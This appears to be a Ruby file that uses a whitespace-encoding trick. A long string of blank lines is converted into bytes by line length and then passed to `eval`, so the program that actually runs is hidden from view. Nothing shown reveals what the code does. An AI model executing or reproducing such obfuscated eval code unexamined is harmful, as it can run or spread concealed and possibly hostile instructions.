  eval '                                                                                                 
                                                             
                                                                       
                                                                                                               
                                                                                                            
                                                                                                      
                                                             
                                                                        
                                                                                                 
                                                                                                                   
                                                                                                        
          
                                                                             
                                                             
                                             
                                                 
          
                                                                                                         
                                                             
                                                
          
                                
                                       
          
                                
                                
                                
                                
                                                                                                 
                                              
                                                                                                         
                                                                                                              
                                                                                                          
                                                                                                     
                                                                                                   
                                                                                                                    
                                
                                                          
                                          
          
          
                                
                                
                                
                                
                                                                                                 
                                              
                                                                                                                   
                                                                                                                
                                                                                                            
                                                                                                         
                                                                                                                    
                                              
                                                                                                                   
                                                                                                               
                                                                                                                  
                                                                                                                    
                                                                                               
                                                                                                  
                                                                                                                         
                                                                                                                           
                                                                                                                            
                                                                                                                       
                                                                                                                            
                                                                                                                       
                                                                                           
                                                 
                                                                                             
                                                                                                                             
                                          
                                  
                                
                                  
          
          
                                
                                
                                
                                
                                                                                                        
                                                                                                               
                                                                                                            
                                                                                                     
                                                 
                                
                                                  
                                              
                                              
                                                                                                 
          
          
                                
                                
                                
                                
                                                                                                 
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                                                                                                           
                                
                                                                                                                            
                                                                                                  
                                                                                                                            
          
                                
                                
                                
                                
                                
                                
                                                                                                  
                                
                                                             
                                                                                                                              
                                
                                               
                                                                                                 
                                                                                                              
                                               
                                
                                                               
                                
                                  
                                                                                                        
                                                                                                 
                                                                                                                    
                                        
                                   
                                                                                                                           
                                                                                                  
                                                                                                                             
                                         
                                  
                                
                                                          
                                
                                        
                                                                                                  
                                
                                                             
                                                                                                                              
                                
                                               
                                                                                                 
                                                                                                                    
                                        
                                              
                                          
                                         
                                               
                                
                                                               
                                
                                  
                                                                                                    
                                                                                                     
                                                                                                 
                                                                                                    
                                  
                                           
                                    
                                                 
                                
                                                          
                                
                                        
                                                                                                  
                                                                                           
                                  
                                         
                                  
                                                                                             
                                
                                                             
                                
                                  
                                        
                                                                                                  
                                                                                                               
                                                                                                              
                                                                                                     
                                         
                                         
                                  
          
                                
                                
                                
                                
                                
                                
                                                                                                  
                                         
                                         
          
                                
                                
                                
                                
                                                                                                                             
          
          
                                
                                
                                
                                
                                        
                                                
                                              
                                              
                                              
                                                                                                   
                                                             
                                                                                                 
                                              
                                                                                                                   
                                                                                                         
                                                                                                                          
                                                                                                     
                                         
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                                                                                                           
                                                                                                                            
                                                                                                  
                                                                                                                            
          
                                
                                
                                
                                
                                
                                
                                        
                                                 
                                              
                                              
                                                                                                   
                                             
                                                                                                  
                                         
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                                                                                                           
                                                                                                                            
                                                                                                    
                                                                                                                            
          
                                
                                
                                
                                
                                
                                
                                
                                
                                                                                                 
                                                                                           
                                                                                                  
                                            
                                                                                                    
                                                                                             
          
                                
                                
                                
                                
                                
                                
                                                                                                                             
          
                                
                                
                                
                                
                                                                                                                             
                                              
                                                                                                      
                                                                                                            
                                                                                                 
                                                                                                                    
                                                                                                                    
                                                                                                     
                                                                                                              
                                        
                                                 
                                         
                                              
                                                                                                                   
                                                                                                               
                                                                                                                  
                                                                                                                    
                                                                                               
                                                                                                  
                                                                                                                         
                                                                                                                           
                                                                                                                            
                                                                                                                        
                                                                                                                            
                                                                                           
                                                                                                                        
                                              
                                                                                                                   
                                                                                                         
                                                                                                                          
                                                                                                     
                                            
                                                                                                                        
                                                                                             
                                                                                                                             
          
          
                                
                                
                                
                                
                                        
                                                 
                                              
                                              
                                                                                                 
                                         
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                                                                                                           
                                                                                                                            
                                                                                                  
                                                                                                                            
          
                                
                                
                                
                                
                                
                                
                                                                                                   
                                
                                                             
                                
                                                                                           
                                                                                                  
                                     
                                                   
                                                            
                                                 
                                                               
                                                          
                                                                                                      
                                                                                                         
                                                                                                                          
                                                                                                                          
                                                          
                                
                                  
                                  
                                            
                                                                                                  
                                     
                                                     
                                                            
                                                 
                                                               
                                                          
                                                                                                  
                                                                                                                     
                                                                                                                          
                                                                                                                          
                                                          
                                
                                  
                                  
                                                                                             
                                          
                                  
                                  
          
                                
                                
                                
                                
                                
                                
                                                                                                   
                                
                                                             
                                                             
                                
                                  
                                  
                                
                                                               
                                
                                                                                                  
                                
                                                          
                                
                                                                                                   
          
                                
                                
                                
                                
                                                                                                                             
          
          
                                
                                
                                
                                
                                                                                                 
                                              
                                                                                                         
                                                                                                              
                                                                                                          
                                                                                                     
                                                                                                   
                                                                                                                    
                                        
                                                                                           
                                                                                             
                                         
                                                                                                                           
                                                                                                                            
                                                                                                  
                                            
                                                                                                   
                                                                                                                            
          
                                
                                
                                
                                
                                
                                
                                        
                                                                                                  
                                                                                           
                                                                             
                                                                                             
                                                                                                                            
                                                                                                                            
                                                                                           
                                                                                             
                                         
                                                                                           
                                                                             
                                                                                             
                                
                                                             
                                                             
                                
                                                                                                   
                                             
                                                 
                                
                                                               
                                
                                                                                                  
                                                                                           
                                                                             
                                                                                             
                                
                                                            
                                                            
                                
                                                                                                   
                                
                                                          
                                
                                                                                                  
                                
                                                            
                                                            
                                
                                                                                           
                                                                                                   
                                                                                             
          
                                
                                
                                
                                
                                
                                
                                                                                                  
          
                                
                                
                                
                                
                                                                                                                             
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                                                                                                           
                                                                                                                            
                                                                                                                        
                                                                                                                            
                                                                                           
                                                                                                                        
                                                                                           
                                                
                                                                                             
                                            
                                                                                                                        
                                                                                           
                                                                             
                                                                                             
                                                                                             
                                              
                                                                                                                     
                                                                                                              
                                                                                                         
                                                                                                                 
                                          
                                  
                                             
                                  
                                                                                                                             
          
          
                                
                                
                                
                                
                                                                                                 
                                
                                                            
                                
                                                   
                                
                                                               
                                
                                                                                           
                                                 
                                            
                                
                                                 
                                                                                             
                                
                                                          
                                
                                        
                                                                                                  
                                
                                                             
                                
                                                                                                        
                                                                                                               
                                                                                                            
                                                                                                     
                                                        
                                
                                                                                                 
                                
                                             
                                
                                                 
          
                                
                                
                                
                                
                                                                                                  
                                
                                           
                                
                                                                                           
                                                                                                  
                                                                                           
                                                                             
                                                                                             
                                
                                           
                                
                                                                                                  
                                                                                           
                                             
                                                  
                                                                                             
                                                                                             
                                         
          
          
                                
                                
                                
                                
                                                                                                  
                                
                                                             
                                
                                                                      
                                                                                                         
                                                                                                            
                                                                                                     
                                              
                                                                                                                  
                                                                                                     
                                                                                                 
                                                                                                    
                                                                                                            
                                                                                                         
                                                                                                              
                                                                                                     
                                                                                                                   
                                        
                                                                                                 
                                         
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                                                                                                           
                                                                                                                            
                                                                                                  
                                                                                                                            
                                                                                                  
                                              
                                                                                                                   
                                                                                                   
                                                                                                 
                                                                                                              
                                
                                               
                                                                                            
                                                                                                                       
                                           
                                               
                                                                                                                             
          
                                
                                
                                
                                
                                                                                                            
                                                                                                               
                                                                                                               
                                                                                                                
                                                                                                                           
          
                                
                                
                                
                                
                                
                                
                                                                                                     
                                
                                                             
                                
                                                                                                  
                                              
                                                                                                         
                                                                                                              
                                                                                                          
                                                                                                     
                                                                                                   
                                                                                                                    
                                        
                                                                                                              
                                                                                                     
                                                                                                                       
                                
                                                
                                         
                                                                                                                           
                                                                                                                            
                                                                                                        
                                            
                                                                                                   
                                                                                                                            
                                                                                                    
                                                             
                                                                                                   
                                                                                           
                                                
                                                                                             
                                
                                                                                                               
                                                                                                                  
                                
                                                                                                              
                                                                                                     
                                                                                                                        
                                                                                                                    
          
                                
                                
                                
                                
                                
                                
                                
                                
                                                                                                        
                                                                                           
                                                                                                    
                                                                                             
                                           
                                                             
                                                 
          
                                
                                
                                
                                
                                
                                
                                
                                
                                                                                                        
          
                                
                                
                                
                                
                                
                                
                                                                                                                             
                                              
                                                                                                                   
                                                                                                               
                                                                                                                  
                                                                                                                    
                                                                                               
                                                                                                  
                                                                                                                         
                                
                                      
                                                          
                                                                                                            
                                                                                                 
                                                                                                                   
                                                                                                                    
          
                                
                                
                                
                                
                                
                                
                                                                                                                  
                                                                                                     
                                                                                                                    
                                                                                                                     
                                                                                                                  
                                                                                                              
                                
                                                                                                     
                                                                                           
                                                                             
                                                                                             
                                                                                           
                                                
                                                                                             
                                
                                                                                                         
                                                                                                      
                                
                                                                                                     
                                                                                           
                                                                             
                                                                                             
                                                                                           
                                                 
                                                                                             
                                
                                                              
                                                             
                                
                                                                                                     
                                              
                                                                                                         
                                                                                                              
                                                                                                          
                                                                                                     
                                                                                                   
                                                                                                                    
                                        
                                                
                                         
                                                                                                                           
                                                                                                                            
                                                                                                                        
                                            
                                        
                                                                                                                         
                                            
                                                                                                                          
                                         
                                                                                                                            
                                                                                                                        
                                           
                                                                                                                          
                                                                                                                             
                                               
                                                  
          
                                
                                
                                
                                
                                
                                
                                                                                                  
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                 
                                                                                                                           
                                                                                                                            
                                                                                                                        
                                                                                                                            
                                                                                                                        
                                             
                                                                                           
                                                                                                     
                                                                                           
                                                
                                                                                             
                                                                                           
                                                
                                                                                             
                                                                                             
                                                                                                                             
          
                                
                                
                                
                                
                                                                                                                             
          
                                
                                
                                       
                                              
                                                                                                                   
                                                                                                                
                                                                                                            
                                                                                                         
                                                                                                                    
                                        
                                               
          
          
                                               
                                         
                                              
                                                                                                             
                                                                                                 
                                                                                                                
                                                                                                                           
                                                                                                                            
                                    
                                                                                                 
                                                                                                                            
                                                                                                     
                                                                                                                      
                                                                                                 
                                                                                                            
                                
                                  
                                                                                                    
                                                                                                     
                                                                                                      
                                
                                                                                                 
                                              
                                                                                                        
                                                                                                               
                                                                                                            
                                                                                                     
                                   
                                                                                                                           
                                                                                                         
                                           
                                                             
                                                 
                                                                                                                             
                                
                                                                                                 
          
                                   
                                    
                                                                                                 
          
                                
                                
                                                                                                     
                                                                                                              
                                                                                                    
                                  
                                                                                                                             
          '.split(/
/).map(&:size).pack("C*")
